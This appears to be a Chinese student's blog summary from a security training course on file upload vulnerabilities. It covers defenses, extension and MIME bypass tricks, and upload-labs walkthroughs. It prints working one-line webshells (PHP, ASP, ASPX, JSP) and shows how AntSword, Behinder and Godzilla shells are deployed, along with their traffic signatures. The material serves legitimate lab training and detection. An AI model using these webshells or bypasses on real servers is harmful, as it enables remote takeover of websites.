网络安全毕业实习实训Day7 总结

最新推荐文章于 2024-10-03 23:14:19 发布
最新推荐文章于 2024-10-03 23:14:19 发布
阅读量1.4k 收藏 28
点赞数 30
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62993379/article/details/141904408
版权

目录

一、文件上传漏洞的防御手段及绕过手段总结

1.1 什么是文件上传漏洞

1.2 防御手段

1.3 绕过手段

二、文件上传常用一句话木马

2.1 php一句话木马

2.2 asp一句话木马

2.3 aspx一句话木马

2.4 jsp一句话木马

三、Webshell管理工具的使用方法

3.1 中国蚁剑(Antsword)

3.2 冰蝎(Behinder)

3.3 哥斯拉(Gozilla)

四、文件上传无回显如何查找webshell地址

五、文件上传表单的无参/有参情况下构造表单

六、upload-labs靶场通关

Pass-06

Pass-07

Pass-08

Pass-09

Pass-10

一、文件上传漏洞的防御手段及绕过手段总结

1.1 什么是文件上传漏洞

如果对文件上传路径变量过滤不严,并且对用户上传的文件后缀以及文件类型限制不严,攻击者可通过 Web访问的目录上传任意文件,包括webshell等,进而远程控制网站服务器。

所以我们在开发网站及应用程序过程中,需严格限制和校验上传的文件,禁止上传恶意代码的文件,并限制相关目录的执行权限(最小权限原则),防范webshell攻击。

1.2 防御手段

  1. 将文件上传的目录设置为不可执行;

  2. 判断文件类型,结合使用MIME Type和后缀检查(可采用白名单,更安全);

  3. 使用随机数改写文件名和文件路径,限制用户访问;

  4. 单独设置文件服务器的域名,解决同源策略问题;

  5. 限制上传文件大小,上传的文件重新修改文件名及后缀名,后端设置再校验机制;

  6. 文件上传的上传保存路径根据业务进行分离(或直接隐藏),下载时重新生成的文件名。

1.3 绕过手段

1. 客户端验证绕过

在前端或客户端对上传文件进行验证时,攻击者可通过禁用 JavaScript 或使用burpsuite代理工具修改请求,从而上传恶意文件。

2. 服务端验证绕过

  • 页面直接修改js上传文件方法(添加类型等)

  • 抓包改包,将上传的文件后缀进行修改;(例如:a.jsp.jpg ——>抓包修改为 a.jsp)

  • 通过修改请求中的 MIME 类型,让服务器认为文件是合法的。例如攻击者修改 HTTP 请求头中的 Content-Type 字段,伪造文件的 MIME 类型为普通图片类型(如 image/jpeg),以绕过上传限制。

3. 文件扩展名绕过

攻击者通过修改文件扩展名,使其绕过文件类型检查。例如,将 .php 文件重命名为 .php.jpg.php;.jpg 等,以欺骗服务器的上传检查机制。

很多语言都存在多个可解析后缀。当目标站点采用黑名单时,往往包含不全,此时则有机会绕过。

语言可解析后缀
asp.netasp,aspx,asa,asax,ascx,ashx,asmx,cer,aSp,aSpx,aSa,aSax,aScx,aShx,aSmx,cEr
phpphp,php5,php4,php3,php2,pHp,pHp5,pHp4,pHp3,pHp2,html,htm,phtml,pht,Html,Htm,pHtml
jspjsp,jspa,jspx,jsw,jsv,jspf,jtml,jSp,jSpx,jSpa,jSw,jSv,jSpf,jHtml
4. 利用特殊字符

利用文件名中的特殊字符(如 null byte)来混淆服务器的文件解析行为。例如 shell.php%00.jpg%00 是空字节,有些服务器会将其后的内容忽略,实际解析为 .php 文件。

5. 文件内容绕过

有些系统会通过读取文件内容来判断类型,攻击者可以将恶意脚本内容嵌入图片或其他合法文件格式中,借此绕过检查并执行恶意代码。

二、文件上传常用一句话木马

2.1 php一句话木马

<?php @eval($_POST['hacker']);?>

  • @ 符号: 这是一个错误抑制符。它告诉 PHP 如果在执行 eval() 函数时发生了错误,不要输出错误信息到浏览器上。这样做是为了隐藏错误,避免暴露给管理员

  • eval() 函数eval() 是一个 PHP 内置函数,用于将字符串作为 PHP 代码执行。也就是说,它会将传入的字符串当成代码来运行。在这个例子中,eval() 会执行 $_POST['hack'] 这个变量的内容

  • $_POST['hacker']$_POST 是一个超全局数组,用来接收通过 HTTP中的POST 方法所传递的数据。$_POST['hack'] 表示接收来自客户端的一个名为 hack 的参数

2.2 asp一句话木马

<%eval request("hack")%>

2.3 aspx一句话木马

<%@ Page Language="Jscript"%><%eval(Request.Item["value"])%>

2.4 jsp一句话木马

<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>  

三、Webshell管理工具的使用方法

这里用pikachu靶场文件上传部分的”client check“关卡演示。

3.1 中国蚁剑(Antsword)

下载蚁剑源代码:https://github.com/AntSwordProject/AntSword-Loader

首次打开加载器时,界面如下图所示:

image-20240903102924374

点击“初始化”按钮,选择一个空目录作为蚁剑的工作目录,加载器会自动下载源代码。

但出现报错“代码解压失败”:

image-20240903103159706

解决方法:

1. 手动 clone antsword 源代码, 或者直接点这里下载源代码并解压。

 git clone https://github.com/AntSwordProject/AntSword.git

2. 打开蚁剑加载器,选择源代码所在目录antSword-master(注:路径中不要有中文)。

image-20240903104036697

3. 待提示初始化完毕时,重新打开蚁剑加载器,即可看到蚁剑的主界面。

image-20240903103802289

安装成功!开始抓流量。

创建一句话木马文件:

image-20240904155203320

由于题目提示只能上传图片,于是把写好的php脚本后缀修改为.jpg:

image-20240904155410740

打开burpsuite代理后,在关卡上传该文件。

image-20240904160025980

抓包成功,修改文件后缀名回php后放行:

image-20240904160143977

成功上传:

image-20240904160600024

打开蚁剑,添加代理:

image-20240904160726021

编辑数据:

image-20240904163303935

测试连接,抓包成功。

image-20240904163447484

流量特征分析:

PHP 类 WebShell流量最中明显的特征为 【@ini_set ("display_errors","0");】同时会带base64编码解码等字符特征, 每个请求体都存在【@ini_set(“display_errors”, “0”);@set_time_limit(0)】开头。并且存在base64等字符,响应包的结果返回格式为 【随机数 结果 随机数】。

3.2 冰蝎(Behinder)

打开冰蝎,点击传输协议,选择default_xor_base64,生成服务端。

image-20240904164408494

找到生成的文件,同理上传到pikachu,抓包修改后放行。

image-20240904164602720

image-20240904164812086

在冰蝎设置代理并新建shell:

image-20240904164850643

image-20240904165015081

双击建立的shell,BP抓包成功。

image-20240904165159509

流量特征分析:发送包是base64,返回包是字节数组,所以会乱码。

3.3 哥斯拉(Gozilla)

打开哥斯拉,在管理菜单生成木马,存到自定义路径中。

image-20240904170002933

image-20240904170036252

同之前的操作,将木马上传,Burpsuite抓包修改后放行:

image-20240904170328282

上传成功。

image-20240904170354624

回到哥斯拉,右键“目标”——>“添加”进行设置。

image-20240904170733593

点击测试连接,用BP拦截。

image-20240904170810656

流量特征分析:

  • 请求包特征:

    1. “pass=”起始

    2. 请求包较长 响应包为0

    3. 一个tcp包里面有三个http

  • 响应包特征:整个响应包的结构体征为:md5前十六位+base64+md5后十六位

四、文件上传无回显如何查找webshell地址

1. 日志分析

  • 日志分析:检查服务器的访问日志或上传日志,查看最近的上传操作记录。常见日志文件包括 Apache 的 access.log 和 error.log、Nginx 的 access.log等,通常可找到上传文件的路径。

  • 目录猜测:通过猜测常见的上传目录(如 /uploads//images//files/ 等)并结合浏览器访问进行测试,寻找可能的 Webshell 文件位置。

2. 代码审计

  • 代码审查:分析 Web 应用的源代码,找到负责文件上传的部分,确定上传文件存储的路径以及文件名生成机制。

  • 检查上传配置:确认应用是否对文件存储路径进行动态设置,定位上传目录的位置。

3. 使用工具

  • 使用如 dirmap等工具进行目录扫描,或者一些主动爆破工具进行爆破,尝试访问已上传的 Webshell 文件。

五、文件上传表单的无参/有参情况下构造表单

1. 无参文件上传表单构造

无参文件上传是指文件上传表单中没有其他参数,仅需要上传文件。表单可以直接构造为:

<form method="POST" enctype="multipart/form-data" action="目标URL">
    <input type="file" name="file">
    <input type="submit" value="上传">
</form>

2. 有参文件上传表单构造

有参文件上传表单包含其他参数,例如用户名、令牌、ID 等。表单构造如下:

<form method="POST" enctype="multipart/form-data" action="目标URL">
    <input type="text" name="username" value="admin">
    <input type="hidden" name="token" value="035200">
    <input type="file" name="file">
    <input type="submit" value="上传">
</form>

六、upload-labs靶场通关

Pass-06

查看源码,发现没有转换大小写:

image-20240904200154229

新建文件:

image-20240904201325597

上传文件,用BP拦截改包,后缀改为.PHP。

image-20240904201957279

打开图片链接:

image-20240904211048836

Pass-07

查看源码,发现没有首位去空:

image-20240904204130767

于是用BP抓包,并在test.php后面加上英文空格然后发送。

image-20240904204543298

打开图片:

image-20240904204639369

image-20240904205103342

Pass-08

查看源码,发现没有删除文件末尾的点这一步。

image-20240904205644121

同理BP拦截改包,后缀末尾加个“."后放包

image-20240904210136394

打开图片链接:

image-20240904210245252

Pass-09

看源码:

image-20240904210612538

于是用BP抓包,在test.php后面加上::$DATA,然后放包。

image-20240904210759976

上传成功。

image-20240904210957766

image-20240904211103918

Pass-10

image-20240904211430773

观察源码,发现该有的都有。但没有循环验证。

所以我们可以通过在test.php后加上“点+空格+点” 的方式来绕过验证。【思路】:首先代码发现有一个点,这时代码会把点去掉,又发现有一个空格,也会把它去掉,我们这时还有一个点,也就是.php. 由于他只是验证一次,所以不会在去掉我们的点,这时就可以上传成功,也可以解析成功。

image-20240904211656611

放包,上传成功。

image-20240904211734067

image-20240904211725688

Yubaibaioo
关注
网络安全毕业实习实训Day1 总结
小鱼的博客
08-27 956
Python、Java环境配置,Pikachu靶场搭建,结合BurpSuite采用多种方法实现弱口令爆破。
网络安全毕业实习实训Day6 总结
小鱼的博客
09-02 1205
CSRF漏洞、SSRF漏洞学习;Pikachu——SSRF通关及漏洞分析。
网络安全 —— 实验(基于华为eNSP模拟器)
这个家伙看起来很懒,只想把你留下来哦
08-05 6378
8. 实验八 —— 通过路由的远程管理(基于实验七的基础配置)8. 实验八 —— 通过路由的远程管理(基于实验七的基础配置)6. 实验六 —— 交换机的远程控制(直接控制和间接控制)6. 实验六 —— 交换机的远程控制(直接控制和间接控制)5. 实验五 —— 将交换机作为PC端通过交换机相连。5. 实验五 —— 将交换机作为PC端通过交换机相连。4. 实验四 —— 两个PC机通过两台交换机相连。2. 实验二 —— 两个PC机通过交换机相连。2. 实验二 —— 两个PC机通过交换机相连。
网络安全毕业实习实训Day4 总结
小鱼的博客
08-30 905
XSS相关知识学习;Xss-labs靶场实战。
网络安全毕业实习实训Day9 总结
小鱼的博客
09-07 1000
CS提权;土豆提权;Windows信息搜集;手工提权思路。
网络安全毕业实习实训Day10 总结
小鱼的博客
09-09 1367
Linux提权;Vulnhub LAMPIAO靶机渗透。
网络安全毕业实习实训Day11 总结
小鱼的博客
09-11 1047
应急响应流程及措施总结;应急事件处理命令;安全事件分类分级。
计算机专业实习实训内容和要求,大学生计算机实习目的和要求.doc
weixin_39578457的博客
06-21 2475
大学生计算机实习目的和要求大学生计算机实习目的和要求1、学生在学习了专业课程之后,通过专业实习,在了解企业概况的基础上,对与计算机应用密切相关的某一方面的管理业务活动进行详细调查和系统分析,建立业务管理信息系统的整体概念,学会运用专业知识去发现问题和解决问题的方法,增强业务实践能力。2、通过实习,参加一定的业务活动和管理实践,了解企业的管理现状、所具备的基础及存在的问题,了解国情,增强学好专业的信...
网络设备安装与调试实践指导书.docx
09-21
掌握访问控制列表的原理、看及配置方法,具备基本的网络安全设置。 三、网络设备配置综合实训地点安排 配备有Cisco二、三层交换机和路由器的网络实验机房。在设备不足的情况下,可以使用Cisco Packet Tracer 5.3...
深度学习:智能时代的核心驱动力量
GitChat
03-20 1万+
内容简介 科技巨头纷纷拥抱学习,自动驾驶、AI、语音识别、图像识别、智能翻译以及震惊世界的 AlphaGo,背后都是学习在发挥的作用。学习是人工智能从概念到繁荣得以实现的主流技术。经过学习训练的计算机,不再被动按照指令运转,而是像自然进化的生命那样,开始自主地从经验中学习。 本书作者特伦斯 · 谢诺夫斯基是人工智能十大科学家之一、学习先驱及奠基者,亲历了学习在 20 世纪 70 年代到 90 年...
模糊测试--强制性安全漏洞发掘
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
2019年度优秀安全内容合集
热门推荐
anquanzushiye的博客
01-06 3万+
2019信息源与信息类型占比微信公众号推荐昵称_英语weixin_no标题网址安全祖师爷PowerShell渗透–帝国https://mp.weixin.qq.com/s/giBR-rn...
网络安全 网络安全的主要领域 安全威胁 防护技术 安全策略 未来趋势
最新发布
weixin_42462436的博客
10-03 1478
随着智能手机和平板电脑的广泛使用,移动设备的安全(如数据加密、设备丢失保护等)也成为重点。由国家级或高级黑客组织发起的持续性、高度隐蔽的网络攻击,通常以窃取敏感信息为目的。使用加密、访问控制、数据备份等手段来保护信息免受未经授权的访问、修改或删除。包括防火墙、入侵检测系统(IDS)、入侵防御系统(IPS)等技术的使用。保证操作系统和相关服务的安全,包括权限控制、补丁管理、系统日志监控等。利用全球收集的安全信息和分析工具,提前识别并防御潜在的威胁。关注对虚拟化平台、API安全、数据隔离和访问管理的控制。
个人网络安全的几个重点与防御
nn_84的博客
10-03 425
2 防火墙 大家都用windows 只需在 gpedit.msc 设置 但有什么未知漏洞就不得而知了 因为美国的计划问题。1 浏览器 firefox 这是第一选择 如果你真的不明白可以找找各个浏览器漏洞。3 移动设备带来的危害 比如u盘 等 对于你们认为杀毒可以 那免杀还干吗呢。网络端口溢出漏洞 但防火墙和随机地址的原因 已经可以防御。提权 这是以后遇到的问题 有些漏洞不是随机地址能够阻止。mail 的危险的 来自与代理和漏洞。浏览器溢出漏洞 实时注意更新就可以。
工业控制过等保三级需要的网络安全设备及详细讲解
weixin_59571541的博客
09-30 879
在工业控制系统(ICS)的安全性日益受到重视的背景下,网络安全等级保护(过等保)三级作为一种重要的安全标准,对保障工业控制系统的安全运行有着重要的意义。过等保三级主要针对那些对安全性要求较高的系统,如电力、石油、化工等关键基础设施,以下是实现过等保三级所需的主要网络安全设备及其详细讲解。
网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 338
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
Web安全 - 文件上传漏洞(File Upload Vulnerability)
小工匠
10-02 1832
文件上传漏洞是指Web应用允许用户上传文件,但没有对上传文件进行充分的验证和限制,导致攻击者可以上传恶意文件,如脚本、恶意代码等,进一步执行恶意操作。这种漏洞常见于文件管理、头像上传或文档管理等功能中。路径穿越结合文件上传:绕过文件上传目录限制,访问或执行敏感位置的文件。远程代码执行(RCE)结合文件上传:通过上传并执行恶意文件实现远程控制。跨站脚本(XSS)结合文件上传:通过文件传播恶意脚本,跨站点执行攻击。跨站请求伪造(CSRF)结合文件上传:在不知情的情况下诱使用户上传恶意文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值